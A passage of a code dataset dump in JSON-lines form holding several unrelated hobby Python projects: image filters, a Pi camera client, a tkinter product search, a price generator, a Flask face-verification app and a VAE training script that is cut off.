pencil_sketch(img)\r\n color= 'GRAY'\r\n elif option=='Embossed':\r\n output = embossed_edges(img) \r\n elif option=='sketch_filter':\r\n output = sketch_filter(img)\r\n color = 'GRAY'\r\n elif option=='cartoon_filter':\r\n output = cartoon_filter(img) \r\n\r\n with output_col:\r\n if output_flag==1:\r\n st.header(\"Output\")\r\n st.image(output,channels=color)\r\n if color =='BGR':\r\n result = Image.fromarray(output[:,:,::-1])\r\n else:\r\n result = Image.fromarray(output)\r\n\r\n #Display the link\r\n st.markdown(get_img_download(result,'output.png','Download'+'Output'),unsafe_allow_html=True) \r\n\r\n", "repo_name": "Iamkartikey44/Filters", "sub_path": "Image_Filter_app.py", "file_name": "Image_Filter_app.py", "file_ext": "py", "file_size_in_byte": 2683, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "io.BytesIO", "line_number": 7, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 9, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 73, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 73, "usage_type": "name"}, {"api_name": "PIL.Image.fromarray", "line_number": 75, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "41099620755", "text": "import time\nimport picamera\nimport picamera.array\nfrom picamera.array import PiRGBArray\nimport cv2\nimport numpy as np\nimport zlib\nimport base64\nimport json\nimport requests\nimport imutils\nimport io\n\nip_addr = 'http://192.168.2.22:5000/predict'\nwith picamera.PiCamera() as camera:\n camera.resolution = (304,400)\n camera.framerate = 30\n camera.rotation = 270\n camera.start_preview()\n time.sleep(2)\n arr = []\n i = 0\n rawCapture = PiRGBArray(camera, size=(300, 400))\n stream = np.empty((304,400,3),dtype=np.uint8)\n for frame in camera.capture_continuous(rawCapture, format = 'rgb', use_video_port=True):\n image = frame.array\n arr.append(image)\n rawCapture.truncate(0)\n i += 1\n if i == 30:\n break\n '''\n while i < 30:\n camera.capture(stream, format='bgr')\n arr.append(stream)\n\n with picamera.array.PiRGBArray(camera,size=camera.resolution) as stream:\n camera.capture(stream, format='bgr')\n # At this point the image is available as stream.array\n #print(stream.array.shape)\n image = stream.array\n image = imutils.resize(image,width=400)#print(image)\n arr.append(image)\n '''\n print(arr[0].shape)\n frames = np.array(arr)\n print(frames.shape)\n #frames = np.ndarray(shape=(30,300,400,3),dtype=np.uint8, buffer = arr)\n data = zlib.compress(frames)\n data = base64.b64encode(data)\n data_send = data\n data2 = base64.b64decode(data)\n data2 = zlib.decompress(data2)\n fdata = np.frombuffer(data2, dtype=np.uint8)\n r = requests.post(ip_addr, data={'imgb64' : data_send})\n n = r.json()\n print(type(r))\n result = json.loads(n)#n\n print(result[\"message\"])", "repo_name": "MorganYeung/Symsense", "sub_path": "cam_test_server.py", "file_name": "cam_test_server.py", "file_ext": "py", "file_size_in_byte": 1749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "picamera.PiCamera", "line_number": 15, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 20, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "zlib.compress", "line_number": 49, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 50, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 52, "usage_type": "call"}, {"api_name": "zlib.decompress", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.frombuffer", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 54, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 55, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 58, "usage_type": "call"}]} +{"seq_id": "13096285055", "text": "import customtkinter\r\nfrom tkinter import *\r\nfrom tkinter import messagebox\r\nimport database\r\n\r\napp = customtkinter.CTk()\r\napp.title('Search Products')\r\napp.geometry('700x600')\r\napp.config(bg='plum')\r\napp.resizable(False,False)\r\n\r\nfont1 = ('Arial',30,'bold')\r\nfont2 = ('Arial',20,'bold')\r\n\r\ndef search_product():\r\n selection = variable3.get()\r\n selection2 = variable.get()\r\n if (selection != 'Select'):\r\n row = database.search_product_id(selection)\r\n name_result_label.configure(text=row[1])\r\n catogry_result_label.configure(text=row[2])\r\n stock_result_label.configure(text=row[3])\r\n price_result_label.configure(text=row[5])\r\n elif ( selection2 != 'Select'):\r\n row = database.search_product_name(selection2)\r\n name_result_label.configure(text=row[1])\r\n catogry_result_label.configure(text=row[2])\r\n stock_result_label.configure(text=row[3])\r\n price_result_label.configure(text=row[5])\r\n \r\n \r\n else:\r\n messagebox.showerror('Error','Select Id')\r\n \r\n\r\ndef insert_item_options():\r\n item = database.fetch_all_item()\r\n item_options.configure(values=item)\r\n\r\ndef insert_ids_options():\r\n ids = database.fetch_all_ids()\r\n ids_options.configure(values=ids)\r\n \r\n\r\ntitle_label = customtkinter.CTkLabel(app,font = font1,text='Search Products',bg_color='purple',text_color='black')\r\ntitle_label.place(x=250,y=15)\r\n\r\nname_label = customtkinter.CTkLabel(app,font = font2,text='Search by name:',bg_color='purple',text_color='black')\r\nname_label.place(x=50,y=100)\r\nvariable = StringVar()\r\n\r\nitem_options = customtkinter.CTkComboBox(app,font=font2,text_color='black',fg_color='white',dropdown_hover_color='purple',button_color='white',button_hover_color='purple',border_color='purple',width=150,variable=variable,state='readonly')\r\nitem_options.set('Select')\r\nitem_options.place(x=200,y=100)\r\n\r\nsearch_label = customtkinter.CTkLabel(app,font = font2,text='Search by Id:',bg_color='purple',text_color='black')\r\nsearch_label.place(x=50,y=130)\r\nvariable3 = StringVar()\r\n\r\nids_options = customtkinter.CTkComboBox(app,font=font2,text_color='black',fg_color='white',dropdown_hover_color='purple',button_color='white',button_hover_color='purple',border_color='purple',width=150,variable=variable3,state='readonly')\r\nids_options.set('Select')\r\nids_options.place(x=200,y=130)\r\n\r\nsearch_button = customtkinter.CTkButton(app,command=search_product,font=font2,text='Search',text_color='black',fg_color='purple',hover_color='plum',bg_color='black',border_color='black',cursor='hand2',corner_radius=7,width=100)\r\nsearch_button.place(x=360,y=100)\r\n\r\nframe = customtkinter.CTkFrame(app,bg_color='#dda0dd',fg_color='black',corner_radius=10,border_width=5,border_color='purple',width=500,height=300)\r\nframe.place(x=60,y=180)\r\n\r\nname_label = customtkinter.CTkLabel(frame,font = font2,text='Name:',bg_color='purple',text_color='black')\r\nname_label.place(x=20,y=50)\r\n\r\ncatogry_label = customtkinter.CTkLabel(frame,font = font2,text='Catogry:',bg_color='purple',text_color='black')\r\ncatogry_label.place(x=230,y=50)\r\n\r\nstock_label = customtkinter.CTkLabel(frame,font = font2,text='stocks:',bg_color='purple',text_color='black')\r\nstock_label.place(x=20,y=200)\r\n\r\nprice_label = customtkinter.CTkLabel(frame,font = font2,text='Price:',bg_color='purple',text_color='black')\r\nprice_label.place(x=230,y=200)\r\n\r\nname_result_label = customtkinter.CTkLabel(frame,font = font2,text='',bg_color='purple',text_color='black')\r\nname_result_label.place(x=100,y=50)\r\n\r\ncatogry_result_label = customtkinter.CTkLabel(frame,font = font2,text='',bg_color='purple',text_color='black')\r\ncatogry_result_label.place(x=330,y=50)\r\n\r\nstock_result_label = customtkinter.CTkLabel(frame,font = font2,text='',bg_color='purple',text_color='black')\r\nstock_result_label.place(x=100,y=200)\r\n\r\nprice_result_label = customtkinter.CTkLabel(frame,font = font2,text='',bg_color='purple',text_color='black')\r\nprice_result_label.place(x=310,y=200)\r\n\r\ninsert_ids_options()\r\ninsert_item_options()\r\napp.mainloop()", "repo_name": "saharahsan/gui-python", "sub_path": "search.py", "file_name": "search.py", "file_ext": "py", "file_size_in_byte": 4056, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "customtkinter.CTk", "line_number": 6, "usage_type": "call"}, {"api_name": "database.search_product_id", "line_number": 19, "usage_type": "call"}, {"api_name": "database.search_product_name", "line_number": 25, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 33, "usage_type": "name"}, {"api_name": "database.fetch_all_item", "line_number": 37, "usage_type": "call"}, {"api_name": "database.fetch_all_ids", "line_number": 41, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 45, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 48, "usage_type": "call"}, {"api_name": "customtkinter.CTkComboBox", "line_number": 52, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 56, "usage_type": "call"}, {"api_name": "customtkinter.CTkComboBox", "line_number": 60, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 64, "usage_type": "call"}, {"api_name": "customtkinter.CTkFrame", "line_number": 67, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 70, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 73, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 76, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 79, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 82, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 85, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 88, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "16705853403", "text": "import pandas as pd\nimport random as rd\nfrom pymongo import MongoClient\nfrom datetime import datetime as dt, timedelta as td\n\nclass Produto:\n\n last_price: float\n value: str = 'R$ {:.2f}'\n \n def __init__(\n self,\n original: float\n ) -> None:\n self.original_price = original\n self.min_price = int(original * 0.4)\n self.last_price = original\n\n\n def price(self) -> str:\n\n op = rd.randrange(0, 3)\n \n if not op:\n return self.value.format(self.last_price)\n \n percent = rd.randrange(5, 96) if op == 1 else rd.randrange(105, 176)\n self.last_price = self.last_price * ( percent / 100 )\n\n if self.last_price > self.original_price:\n self.last_price = self.original_price\n\n if self.last_price < self.min_price:\n self.last_price = self.min_price\n\n return self.value.format(self.last_price)\n\nclass iPhone(Produto):\n\n name: str = \"iPhone 11 64GB\"\n\nclass Xbox(Produto):\n\n name: str = \"Xbox Series S\"\n\nclass Nintendo(Produto):\n\n name: str = 'Nintendo Switch'\n\nclass TV(Produto):\n\n name: str = 'TV Samsung T5300 43\"'\n\n\n# Valores KB\nxboxKB = Xbox(2750)\ntvKB = TV(3000)\niphoneKB = iPhone(6150)\nnintendoKB = Nintendo(2000)\n\n# Valores PC\nxboxPC = Xbox(2500)\ntvPC = TV(3000)\niphonePC = iPhone(6650)\nnintendoPC = Nintendo(2300)\n\n# Valores NE\nxboxNE = Xbox(2750)\ntvNE = TV(1500)\niphoneNE = iPhone(7500)\nnintendoNE = Nintendo(2500)\n\n# Config\ndata = dt(2022, 4, 1, 0, 0, 0)\n\nclient = MongoClient()\ndb = client[\"precos\"]\nprecos = db[\"tabela_precos\"]\n\ntarget = dt(2022, 5, 15, 23, 0, 0)\n\nvalues = []\n\nwhile data != target:\n\n data_format = data.strftime(\"%Y-%m-%d %H:%M:00\")\n\n modelXB = {\n \"Nome\": xboxKB.name,\n \"Data\": data_format,\n \"ValorKB\": xboxKB.price(),\n \"ValorPC\": xboxPC.price(),\n \"ValorNE\": xboxNE.price(),\n }\n\n modelIP = {\n \"Nome\": iphoneKB.name,\n \"Data\": data_format,\n \"ValorKB\": iphoneKB.price(),\n \"ValorPC\": iphonePC.price(),\n \"ValorNE\": iphoneNE.price(),\n }\n\n modelTV = {\n \"Nome\": tvKB.name,\n \"Data\": data_format,\n \"ValorKB\": tvKB.price(),\n \"ValorPC\": tvPC.price(),\n \"ValorNE\": tvNE.price(),\n }\n\n modelNT = {\n \"Nome\": nintendoKB.name,\n \"Data\": data_format,\n \"ValorKB\": nintendoKB.price(),\n \"ValorPC\": nintendoPC.price(),\n \"ValorNE\": nintendoNE.price(),\n }\n\n values.append(modelXB)\n values.append(modelIP)\n values.append(modelTV)\n values.append(modelNT)\n \n data = data + td(hours=1)\n\n\nprecos.insert_many(values)\n\ndf = pd.DataFrame(values)\ndf.to_csv(\"./dados.csv\", sep=',', encoding='utf-8', index=False)", "repo_name": "AdrianoNDL/PROJETO-TI", "sub_path": "dados.py", "file_name": "dados.py", "file_ext": "py", "file_size_in_byte": 2731, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "random.randrange", "line_number": 22, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 74, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 80, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 125, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "16476740804", "text": "from flask import Flask, render_template, request\nimport keras\nfrom keras.layers import Input, Conv2D, Lambda, Dense, Flatten,MaxPooling2D,Activation, Dropout\nfrom keras.models import Model, Sequential\nfrom keras.regularizers import l2\nfrom keras import backend as K\nfrom tensorflow.keras.optimizers import Adam\nfrom skimage.io import imshow\n# import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\nfrom keras.preprocessing import image\nfrom tensorflow.keras.preprocessing.image import img_to_array\nimport tensorflow as tf\n#from matplotlib import pyplot as plt\nfrom imutils import face_utils\nimport numpy as np\n# import argparse\nimport imutils\nimport dlib\nimport cv2\n# from google.colab.patches import cv2_imshow\nfrom keras.preprocessing import image\nfrom PIL import Image\n\napp = Flask(__name__)\n\ndef initialize_weights(shape, dtype=None):\n \"\"\"\n The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf\n suggests to initialize CNN layer weights with mean as 0.0 and standard deviation of 0.01\n \"\"\"\n return np.random.normal(loc = 0.0, scale = 1e-2, size = shape)\n\ndef initialize_bias(shape, dtype=None):\n \"\"\"\n The paper, http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf\n suggests to initialize CNN layer bias with mean as 0.5 and standard deviation of 0.01\n \"\"\"\n return np.random.normal(loc = 0.5, scale = 1e-2, size = shape)\n\ndef get_siamese_model(input_shape):\n \"\"\"\n Model architecture based on the one provided in: http://www.cs.utoronto.ca/~gkoch/files/msc-thesis.pdf\n \"\"\"\n \n # Define the tensors for the two input images\n left_input = Input(input_shape)\n right_input = Input(input_shape)\n \n # Convolutional Neural Network\n model = Sequential()\n model.add(Conv2D(64, (10,10), activation='relu', input_shape=input_shape,\n kernel_initializer=initialize_weights, kernel_regularizer=l2(2e-4)))\n model.add(MaxPooling2D())\n model.add(Conv2D(128, (7,7), activation='relu',\n kernel_initializer=initialize_weights,\n bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)))\n model.add(MaxPooling2D())\n model.add(Conv2D(128, (4,4), activation='relu', kernel_initializer=initialize_weights,\n bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)))\n model.add(MaxPooling2D())\n model.add(Conv2D(256, (4,4), activation='relu', kernel_initializer=initialize_weights,\n bias_initializer=initialize_bias, kernel_regularizer=l2(2e-4)))\n model.add(Flatten())\n model.add(Dense(4096, activation='sigmoid',\n kernel_regularizer=l2(1e-3),\n kernel_initializer=initialize_weights,bias_initializer=initialize_bias))\n \n # Generate the encodings (feature vectors) for the two images\n encoded_l = model(left_input)\n encoded_r = model(right_input)\n \n # Add a customized layer to compute the absolute difference between the encodings\n L1_layer = Lambda(lambda tensors:K.abs(tensors[0] - tensors[1]))\n L1_distance = L1_layer([encoded_l, encoded_r])\n \n # Add a dense layer with a sigmoid unit to generate the similarity score\n prediction = Dense(1,activation='sigmoid',bias_initializer=initialize_bias)(L1_distance)\n \n # Connect the inputs with the outputs\n siamese_net = Model(inputs=[left_input,right_input],outputs=prediction)\n \n # return the model\n return siamese_net\n\ndef crop_center(pil_img, crop_width, crop_height):\n img_width, img_height = pil_img.size\n return pil_img.crop(((img_width - crop_width) // 2,\n (img_height - crop_height) // 2,\n (img_width + crop_width) // 2,\n (img_height + crop_height) // 2))\n\ndef crop_max_square(pil_img):\n return crop_center(pil_img, min(pil_img.size), min(pil_img.size))\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef predict():\n # Get the uploaded images\n image1 = request.files[\"image1\"]\n image2 = request.files[\"image2\"]\n\n # Perform facial recognition prediction....................................................\n model = get_siamese_model((80, 80, 3))\n optimizer = Adam(learning_rate = 0.00006)\n model.compile(loss=\"binary_crossentropy\",optimizer=optimizer)\n # model.load_weights('/content/drive/My Drive/Colab Notebooks/capstone project/Nose_model/siamese_network.h5')\n model.load_weights('siamese_network.h5')\n # initialize dlib's face detector (HOG-based) and then create\n # the facial landmark predictor\n detector = dlib.get_frontal_face_detector()\n predictor = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\n # predictor = dlib.shape_predictor(args[\"shape_predictor\"])\n \n #First image processing.....\n height, width, channels = image1.shape\n if height < 500 and width < 500:\n return render_template(\"index.html\", prediction='Size of image 1 should be below 500,500')\n \n # load the input image, resize it, and convert it to grayscale\n # image = imutils.resize(image, width=500)\n height, width, channels = image1.shape\n gray = cv2.cvtColor(image1, cv2.COLOR_BGR2GRAY)\n\n # detect faces in the grayscale image\n rects = detector(gray, 1)\n\n # loop over the face detections\n for (i, rect) in enumerate(rects):\n # determine the facial landmarks for the face region, then\n # convert the facial landmark (x, y)-coordinates to a NumPy\n # array\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n\n x_min,y_min = np.amin(shape[27:36], axis = 0)\n x_max,y_max = np.amax(shape[27:36], axis = 0)\n\n offsetX = (y_max-y_min - (x_max-x_min))/2\n offsetX = int(offsetX)\n\n img = cv2.cvtColor(image1[y_min:y_max, x_min-offsetX:x_max+offsetX], cv2.COLOR_BGR2RGB)\n img = Image.fromarray(img)\n img = crop_max_square(img)\n img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n img = imutils.resize(img, width=80, height=80)\n # cv2_imshow(img)\n\n img1 = img\n \n #Second image processing.....\n height, width, channels = image2.shape\n if height < 500 and width < 500:\n return render_template(\"index.html\", prediction='Size of image2 should be below 500,500')\n # load the input image, resize it, and convert it to grayscale\n # image = imutils.resize(image, width=500)\n height, width, channels = image2.shape\n gray = cv2.cvtColor(image2, cv2.COLOR_BGR2GRAY)\n\n # detect faces in the grayscale image\n rects = detector(gray, 1)\n\n # loop over the face detections\n for (i, rect) in enumerate(rects):\n # determine the facial landmarks for the face region, then\n # convert the facial landmark (x, y)-coordinates to a NumPy\n # array\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n\n x_min,y_min = np.amin(shape[27:36], axis = 0)\n x_max,y_max = np.amax(shape[27:36], axis = 0)\n\n offsetX = (y_max-y_min - (x_max-x_min))/2\n offsetX = int(offsetX)\n\n img = cv2.cvtColor(image2[y_min:y_max, x_min-offsetX:x_max+offsetX], cv2.COLOR_BGR2RGB)\n img = Image.fromarray(img)\n img = crop_max_square(img)\n img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)\n img = imutils.resize(img, width=80, height=80)\n # cv2_imshow(img)\n\n img2 = img\n \n #Final Prediction.....\n img1 = np.expand_dims(img1, axis=0)\n img1.shape\n img2 = np.expand_dims(img2, axis=0)\n img2.shape\n predTest = (model.predict([img1, img2]) > 0.5).astype(\"int32\")\n if predTest==0:\n return render_template(\"index.html\", prediction='Images are not of same person')\n if predTest==1:\n return render_template(\"index.html\", prediction='Images are of same person')\n \n \n\nif __name__ == \"__main__\":\n app.run(debug=True)\n", "repo_name": "ShivamTarte/flask-test", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7902, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "46", "api": [{"api_name": "flask.Flask", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 41, "usage_type": "attribute"}, {"api_name": "keras.layers.Input", "line_number": 49, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 50, "usage_type": "call"}, {"api_name": "keras.models.Sequential", "line_number": 53, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 54, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 55, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 56, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 57, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 59, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 60, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 61, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 62, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling2D", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Conv2D", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 65, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 66, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 67, "usage_type": "call"}, {"api_name": "keras.regularizers.l2", "line_number": 68, "usage_type": "call"}, {"api_name": "keras.layers.Lambda", "line_number": 76, "usage_type": "call"}, {"api_name": "keras.backend.abs", "line_number": 76, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 76, "usage_type": "name"}, {"api_name": "keras.layers.Dense", "line_number": 80, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request.files", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 105, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 106, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 106, "usage_type": "name"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 110, "usage_type": "call"}, {"api_name": "dlib.get_frontal_face_detector", "line_number": 116, "usage_type": "call"}, {"api_name": "dlib.shape_predictor", "line_number": 117, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 123, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 128, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 128, "usage_type": "attribute"}, {"api_name": "imutils.face_utils.shape_to_np", "line_number": 139, "usage_type": "call"}, {"api_name": "imutils.face_utils", "line_number": 139, "usage_type": "name"}, {"api_name": "numpy.amin", "line_number": 141, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 142, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 147, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 147, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 148, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 148, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 150, "usage_type": "attribute"}, {"api_name": "imutils.resize", "line_number": 151, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 159, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 163, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 163, "usage_type": "attribute"}, {"api_name": "imutils.face_utils.shape_to_np", "line_number": 174, "usage_type": "call"}, {"api_name": "imutils.face_utils", "line_number": 174, "usage_type": "name"}, {"api_name": "numpy.amin", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 177, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 182, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 182, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 183, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 183, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.COLOR_RGB2BGR", "line_number": 185, "usage_type": "attribute"}, {"api_name": "imutils.resize", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 198, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 200, "usage_type": "call"}]} +{"seq_id": "44015126144", "text": "import sys\nimport os\nimport numpy as np\nfrom model import *\nfrom datasets import get_vocabulary, prepare_pair_data\nimport cPickle as pickle\nimport shutil\n\n\nencoder_hidden_size = 512\nn_encoder_layers = 2\ndecoder_hidden_size = 512\nembed_size = 128\nvocabulary_size = 20000\nlearning_rate = 0.0001\nn_steps = 1500000\ngrad_clip = 10.0\n\nsave_every = n_steps // 20\nlog_every_n_seconds = 5 * 60\nlog_every_n_steps = 10000\n\n#kld_start_inc = 0 #.01 * n_steps\nkld_start_inc = 10000\nkld_weight = 0.0\nkld_max = 1.0\nkld_inc = (kld_max - kld_weight) / (n_steps // 2)\n#kld_inc = 0.\nhabits_lambda = .2\n\nword_dropout = 0.25\n\ntemperature = 1.0\ntemperature_min = .75\n# should get to the temperature around 50% through training, then hold\ntemperature_dec = (temperature - temperature_min) / (0.5 * n_steps)\n#temperature_dec = 0.\nUSE_CUDA = True\n\n\n# Training\n# ------------------------------------------------------------------------------\n\nif len(sys.argv) < 2:\n print(\"Usage: python train.py [filename]\")\n sys.exit(1)\n\nreverse = True\ncsv = False\nif sys.argv[1].endswith(\".csv\"):\n csv = True\n\nif sys.argv[1].endswith(\".pkl\"):\n cache_path = sys.argv[1]\nelse:\n tmp_path = \"/Tmp/kastner/\"\n cache_path = tmp_path + sys.argv[1].split(os.sep)[-1].split(\".\")[0] + \"_stored_info.pkl\"\n\nif not os.path.exists(cache_path):\n print(\"Cached info at {} not found\".format(cache_path))\n print(\"Creating cache... this may take some time\")\n input_side, output_side, pairs = prepare_pair_data(sys.argv[1], vocabulary_size, reverse, csv)\n with open(cache_path, \"wb\") as f:\n pickle.dump((input_side, output_side, pairs), f)\nelse:\n start_load = time.time()\n print(\"Fetching cached info at {}\".format(cache_path))\n with open(cache_path, \"rb\") as f:\n input_side, output_side, pairs = pickle.load(f)\n end_load = time.time()\n print(\"Cache {} loaded, total load time {}\".format(cache_path, end_load - start_load))\n\nrandom_state = np.random.RandomState(1999)\nrandom_state.shuffle(pairs)\n\n\ndef random_training_set():\n pair_i = random_state.choice(len(pairs))\n pair = pairs[pair_i]\n inp = word_tensor(input_side, pair[0])\n target = word_tensor(output_side, pair[1])\n #inp_str = long_word_tensor_to_string(input_side, inp)\n #target_str = long_word_tensor_to_string(output_side, target)\n #from IPython import embed; embed(); raise ValueError()\n return inp, target\n\nn_words = input_side.n_words\ne = EncoderRNN(n_words, encoder_hidden_size, embed_size, n_encoder_layers, bidirectional=True)\n\n# custom weights initialization\ndef rnn_weights_init(m):\n for c in m.children():\n classname = c.__class__.__name__\n if classname.find(\"GRU\") != -1:\n for k, v in c.named_parameters():\n if \"weight\" in k:\n v.data.normal_(0.0, 0.02)\n\nd = DecoderRNN(embed_size, decoder_hidden_size, n_words, 1, word_dropout=word_dropout)\nrnn_weights_init(d)\n\nvae = VAE(e, d)\nif os.path.exists(\"vae.pt\"):\n print(\"Found saved model {}, continuing...\".format(\"vae.pt\"))\n shutil.copyfile(\"vae.pt\", \"vae.pt.bak\")\n vae = torch.load(\"vae.pt\")\n print(\"Found model was already trained for {} steps\".format(vae.steps_seen))\n temperature = temperature_min\n temperature_min = temperature_min\n temperature_dec = 0.\n\n kld_weight = kld_max\n kld_inc = 0.\n\n # change random seed and reshuffle the data, so that we don't repeat the same\n # use hash of the weights and biases? try with float16 to avoid numerical issues in the tails...\n new_seed = hash(tuple([hash(tuple(vae.state_dict()[k].cpu().numpy().ravel().astype(\"float16\"))) for k, v in vae.state_dict().items()]))\n # must be between 0 and 4294967295\n new_seed = abs(new_seed) % 4294967295\n print(\"Setting new random seed {}\".format(new_seed))\n random_state = np.random.RandomState(new_seed)\n print(\"Reshuffling training data\")\n random_state.shuffle(pairs)\n\noptimizer = torch.optim.Adam(vae.parameters(), lr=learning_rate)\ncriterion = nn.CrossEntropyLoss()\n\n\nif USE_CUDA:\n vae.cuda()\n criterion.cuda()\n print(\"Using CUDA!\")\n\n\n\"\"\"\nsave_every = 5000\njob = sconce.Job('vae', {\n 'hidden_size': hidden_size,\n 'embed_size': embed_size,\n 'learning_rate': learning_rate,\n 'kld_weight': kld_weight,\n 'temperature': temperature,\n 'grad_clip': grad_clip,\n})\n\njob.log_every = log_every\n\"\"\"\n\ndef save():\n save_filename = 'vae.pt'\n torch.save(vae, 